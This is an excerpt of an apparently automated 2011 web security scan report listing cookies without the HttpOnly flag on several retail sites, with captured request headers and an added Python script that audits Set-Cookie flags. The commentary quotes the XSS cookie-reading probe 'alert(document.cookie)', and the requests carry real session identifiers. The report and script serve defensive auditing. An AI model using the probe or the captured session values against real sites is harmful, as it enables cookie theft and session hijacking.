s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...

13.145. http://www.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bnh/controller/home?KW=BANNER2&img=bh_wl.gif HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; TS29f0cc=d35b183be3c07378b7d4c90c4d1f57e3871d7ea6dc67d58e4dd0802d60ac0ec5a2f86729b092ce85bc587bdd; cmTPSet=Y

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Expires: Mon, 16 May 2011 01:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:52:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; Path=/
Content-Length: 39479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>B&amp;H Photo Vi
...[SNIP]...

13.146. http://www.bluefly.com/__ssobj/ard.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /__ssobj/ard.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /__ssobj/ard.png?5607126572844751644_1_1115-1-1305510889 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb

Response

HTTP/1.1 204 No Content
Date: Mon, 16 May 2011 02:01:31 GMT
Last-Modified: Wed, 05 Aug 2009 23:54:00 GMT
ETag: "2c-0-4706db78c1600"
Accept-Ranges: bytes
Content-Length: 0
Expires: -1
Pragma: no-cache
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
RTSS: 1
Set-Cookie: TS18d374=0ff07cecafdfb94efdbdc38c51098cdedc25568252c8426a4dd0857b; Path=/


13.147. http://www.bluefly.com/__ssobj/core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /__ssobj/core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /__ssobj/core.js HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; CoreAt=; SSLB=1; SSRT=24TQTQE; TLTHID=0BB9DB2A7F60107F22099FFA97D9051C; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511132981&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:52 GMT
Last-Modified: Wed, 05 Aug 2009 23:54:00 GMT
ETag: "2c-0-4706db78c1600"
Accept-Ranges: bytes
Expires: Mon, 23 May 2011 01:58:52 GMT
Cache-Control: private, max-age=604800
Vary: Accept-Encoding
RTSS: 1
Content-Type: application/javascript
Set-Cookie: TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; Path=/
Content-Length: 3771

/* Copyright 2010, SiteSpect, Inc. All Rights Reserved. */
(function(d,e){var a=d.document;var b=d.location;var c={};c.Cookie=function(f){var i="\v";function m(n,p,o){return encodeURIComponent(n)+"="+
...[SNIP]...

13.148. http://www.bluefly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; CoreAt=; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:44 GMT
Last-Modified: Mon, 18 Aug 2008 12:14:25 GMT
ETag: "187f-e36-454bae9806a40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Age: 43
RTSS: 1
Content-Type: image/x-icon
Set-Cookie: TS18d374=f06f6803ce0a02994e7215640eaf99a1dc25568252c8426a4dd08600; Path=/
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...

13.149. http://www.bluefly.com/myfly/forgot_password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/forgot_password.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myfly/forgot_password.jsp HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; mr_referredVisitor=0; SSLB=1; SSRT=24TQTQE; TLTHID=0BB9DB2A7F60107F22099FFA97D9051C; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; CoreAt=; cmRS=&t1=1305511135851&t2=1305511138934&t3=1305541454084&t4=1305511132981&lti=1305541454081&ln=&hr=/myfly/forgot_password.jsp&fti=&fn=keyword_search_0%3A0%3Bmyaccount_create%3A1%3B%3A2%3B&ac=&fd=&uer=&fu=&pi=myflyLogin&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:35:18 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSID=AwA6gCkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAADm_dBNAAAAAAAAAAAAAAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSSC=1.G5607126572844751644.2.0.0; path=/; domain=.bluefly.com
Set-Cookie: SSRT=5v3QTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSOD=0; path=/; domain=.bluefly.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=31B28F287FA8107F30ACA5F8317B6541; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=e7ab75325d7e77e85138a8025c5c042cdc25568252c8426a4dd0fde6; Path=/
Content-Length: 38736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...
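The issue detail repeated for every entry in this section asks the reader to review the cookies that lack HttpOnly and decide whether any of them carries a session token. The following Python script is an added example for this report, not part of the Burp output and not code from any of the scanned sites. It parses the Set-Cookie headers out of a raw response of the shape shown in these entries, lists the flags each cookie is missing (HttpOnly and Secure), skips deletions (a past Expires, as on the brookstone.com account_firstName_2 cookie), collapses repeated names the way a browser does (bluenile.com sets bnper five times in one response, gnc.com sets browser_id six times) and applies a name-based heuristic for likely session cookies. The sample response is constructed from cookie names that appear in this report; the JSESSIONID line, the heuristic regular expression and the fixed scan time are assumptions, not observations from the scan.

```python
"""Audit the Set-Cookie headers of a raw HTTP response for missing HttpOnly/Secure.

Added example for this report; not part of the Burp output or of any scanned
site's code. SAMPLE_RESPONSE is CONSTRUCTED: cookie names and attribute layout
mirror bluenile.com / brookstone.com responses in the report, the JSESSIONID
line is an invented hardened cookie added for contrast.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Heuristic only (assumption, not from the report): names that usually carry a
# session or authentication token. Tune for the application under test.
SESSION_NAME_RE = re.compile(r"sess|jsessionid|asp\.net_sessionid|auth|token|login", re.I)

_DATE_RE = re.compile(r"(\d{1,2})[ -]([A-Za-z]{3})[ -](\d{4}) (\d{2}):(\d{2}):(\d{2})")
_MONTHS = {m: i for i, m in enumerate("jan feb mar apr may jun jul aug sep oct nov dec".split(), 1)}


def parse_cookie_date(text: str) -> Optional[datetime]:
    """Parse the date shapes seen in the report: 'Thu, 13-May-2021 02:03:01 GMT',
    'Wed, 31 Dec 1969 23:59:59 GMT' and the non-standard 'Thursday, 13-May-2021 ...'.
    The weekday is ignored, as RFC 6265 cookie-date parsing does."""
    m = _DATE_RE.search(text)
    if not m:
        return None
    day, mon, year, hh, mm, ss = m.groups()
    try:
        return datetime(int(year), _MONTHS[mon.lower()], int(day),
                        int(hh), int(mm), int(ss), tzinfo=timezone.utc)
    except (KeyError, ValueError):
        return None


@dataclass
class CookieAudit:
    name: str
    value: str
    attrs: Dict[str, str]      # lower-cased attribute name -> value ('' for bare flags)
    is_deletion: bool          # Expires in the past or Max-Age <= 0: not a cookie "issued"
    looks_like_session: bool   # name matches SESSION_NAME_RE (heuristic)
    missing: List[str]         # flags absent from the header, e.g. ['HttpOnly', 'Secure']


def parse_set_cookie(header_value: str, now: datetime) -> CookieAudit:
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for p in parts[1:]:
        if p:
            k, _, v = p.partition("=")
            attrs[k.strip().lower()] = v.strip()
    expires = parse_cookie_date(attrs["expires"]) if "expires" in attrs else None
    max_age = attrs.get("max-age")
    deletion = (expires is not None and expires < now) or (
        max_age is not None and max_age.lstrip("-").isdigit() and int(max_age) <= 0)
    missing = [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in attrs]
    return CookieAudit(name.strip(), value, attrs, deletion,
                       bool(SESSION_NAME_RE.search(name)), missing)


def audit_response(raw: str, now: Optional[datetime] = None) -> List[CookieAudit]:
    """Return one CookieAudit per Set-Cookie header, in wire order."""
    now = now or datetime.now(timezone.utc)
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    audits = []
    for line in head.splitlines()[1:]:          # skip the status line
        hname, sep, hval = line.partition(":")
        if sep and hname.strip().lower() == "set-cookie":
            audits.append(parse_set_cookie(hval.strip(), now))
    return audits


def final_cookies(audits: List[CookieAudit]) -> Dict[str, CookieAudit]:
    """What the browser ends up storing: for a repeated name the last Set-Cookie
    wins and deletions remove the cookie. Simplification: Domain and Path are
    not used to tell cookies apart."""
    store: Dict[str, CookieAudit] = {}
    for a in audits:
        if a.is_deletion:
            store.pop(a.name, None)
        else:
            store[a.name] = a
    return store


def review_lines(audits: List[CookieAudit]) -> List[str]:
    """The 'review the contents of the cookies' step from the issue detail, as text."""
    lines = []
    for name, a in sorted(final_cookies(audits).items()):
        if a.missing:
            tag = "SESSION?" if a.looks_like_session else "non-session"
            lines.append(f"{name}: missing {', '.join(a.missing)} [{tag}] value={a.value[:24]!r}")
    return lines


SAMPLE_RESPONSE = (  # constructed; see module docstring
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 16 May 2011 02:03:04 GMT\r\n"
    "Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/\r\n"
    "Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/\r\n"
    "Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/\r\n"
    "Set-Cookie: account_firstName_2=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT\r\n"
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; HttpOnly\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SCAN_TIME = datetime(2011, 5, 16, 10, 0, tzinfo=timezone.utc)  # assumed fixed "now", matches the report date

if __name__ == "__main__":
    for line in review_lines(audit_response(SAMPLE_RESPONSE, SCAN_TIME)):
        print(line)
```

Two caveats for reading the output. HttpOnly only keeps a cookie out of `document.cookie`; the gnc.com request further down in this section carries exactly that probe (`alert(document.cookie)`), and an injected script that cannot read the cookie can still make authenticated requests in the victim's browser, so HttpOnly narrows the blast radius of an XSS, it does not remove it. Secure is reported alongside HttpOnly because several of these hosts are browsed over plain http:// in the report, so a cookie without Secure travels in clear text on those requests regardless of whether an https:// endpoint also exists.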

13.150. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

13.151. http://www.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:04 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
Set-Cookie: bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnses=ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 105239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.or
...[SNIP]...

13.152. http://www.bluenile.com/build-your-own-diamond-ring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...

13.153. http://www.bluenile.com/channel-recommendations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /channel-recommendations.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channel-recommendations.html?channelUrl=%2F&_=1305510935975 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
